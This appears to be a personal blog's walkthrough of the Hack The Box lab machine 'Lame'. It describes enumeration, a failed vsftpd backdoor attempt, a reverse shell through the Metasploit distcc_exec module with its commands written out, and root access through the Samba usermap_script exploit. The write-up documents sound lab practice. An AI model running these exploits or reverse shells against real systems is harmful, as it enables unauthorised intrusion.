HackTheBoxPentesting

Hack The Box – Lame

Eric Turner

Link: https://app.hackthebox.eu/machines/1

IP: 10.129.196.171

Enumeration

nmap scan with version detection and skip host discovery

Our nmap scan revealed we have an ftp server running on a very vulnerable vsftpd 2.3.4. This version has a vulnerability that can allow backdoor command execution.

I attempted to connect to the samba share with anonymous authentication but we do not get any access.

Gaining Access

Currently, my path forward is to use one of the BCE vulns found for vsftpd:

Next I downloaded the code, a python3 script, and supplied the IP as the host parameter.

However after attempting to use this script, and loading msfconsole and attempting the exploit from there, this appears to be a honeypot.

Next, I performed a full port scan and revealed a new port, 3632:

According to this guide, we can use metasploit to check if it’s vulnerable to CVE-2004-2687.

I ran the following commands and gained a reverse shell:

$ msfconsole
use exploit/unix/misc/distcc_exec
show targets
set TARGET 0
show options
set RHOSTS 10.129.196.171
show payloads
# my first choice reverse_bash did not work
set PAYLOAD payload/cmd/unix/reverse
exploit

After running whoami we can see we are the daemon account. I navigated to /home and found four directories, ftp, makis, service, user.

The user.txt flag is found in makis.

Privilege Escalation

We have the user flag but we still need the root flag.

The /home/user folder has a /.ssh folder in it, but the owner and group are set to 1001, a non existent user and group. But we are unable to change owner/group.

I checked for any suid/guid binaries but nothing stood out.

Our linux version is Ubutnu 8.04, kernel 2.6.24-16-server. Doing some additional searching shows there is a privilege escalation memory corruption script.

But this may not work in our case because I do not have user/pass to login.

I checked the exact samba version with smbstatus and found we are on v3.0.20 using searchsploit, there is a usermap_script vulnerability for this version.

I fire up msfconsole again and find the same /exploit/multi/samba/usermap_script. I set the options and it falls back to a default payload of /cmd/unix/reverse_netcat

Once we gain shell, a whoami tells us we are root!

Now we can snag the /root/root.txt flag.

Conclusion

This was pretty fun. The vsftpd server seemed to be a honeypot, the exploit I found for that version did not work. It required me to do more enumeration, where I found distcc, also vulnerable. This gave us access to the user.txt flag as daemon, but I could not find a way to privesc directly in the shell. I did more enumeration to figure out the exact samba version, and it was vulnerable, and this allowed us root to grab the last flag. It was great for making you stay on your toes and keep finding new paths!

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.